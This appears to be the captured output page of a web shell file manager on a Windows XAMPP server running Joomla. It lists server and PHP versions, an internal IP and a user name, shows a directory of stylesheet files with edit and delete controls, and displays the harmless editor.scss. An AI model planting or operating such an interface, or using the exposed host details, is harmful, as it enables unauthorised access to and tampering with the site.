[ SYSTEM ]: Windows NT SWD-ELEARN-11 10.0 build 20348 (Windows Server 2016) AMD64
[ SERVER ]: Apache/2.4.41 (Win64) OpenSSL/1.1.1c PHP/7.3.9 | PHP: 7.3.9
[ USER ]: Elearn | IP: 10.201.204.156
GEFORCE FILE MANAGER
/
C:
/
xampp
/
htdocs
/
Ajaji
/
media
/
system
/
scss
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📁 fields
SET
[ DEL ]
📄 editor.scss
1,249 B
SET
[ EDIT ]
|
[ DEL ]
📄 joomla-core-loader.scss
1,852 B
SET
[ EDIT ]
|
[ DEL ]
📄 joomla-fontawesome.scss
496 B
SET
[ EDIT ]
|
[ DEL ]
📄 system-admin-error.scss
817 B
SET
[ EDIT ]
|
[ DEL ]
📄 system-admin-system.scss
1,259 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: editor.scss
/** * @copyright (C) 2005 Open Source Matters, Inc. <https://www.joomla.org> * @license GNU General Public License version 2 or later; see LICENSE.txt */ body { font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial, "Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol", "Noto Color Emoji"; font-size: 1rem; line-height: 1.3em; color: #22262a; background: #fff; } h1, h2, h3, h4 { font-weight: bold; } h1 { font-size: 1.857rem; } h2 { font-size: 1.571rem; } h3 { font-size: 1.286rem; } a:link, a:visited { font-weight: normal; color: #1b57b1; text-decoration: none; } a:hover { font-weight: normal; color: #00c; text-decoration: underline; } div.caption { padding: 0 10px; } div.caption img { border: 1px solid #ccc; } div.caption p { font-size: .9em; color: #666; text-align: center; } /* STYLES FOR JOOMLA! EDITOR */ hr#system-readmore { color: #f00; border: #f00 dashed 1px; } hr.system-pagebreak { color: #808080; border: #808080 dashed 1px; } span[lang] { padding: 2px; border: 1px dashed #bbb; &:after { font-size: smaller; color: #f00; vertical-align: super; content: attr(lang); } }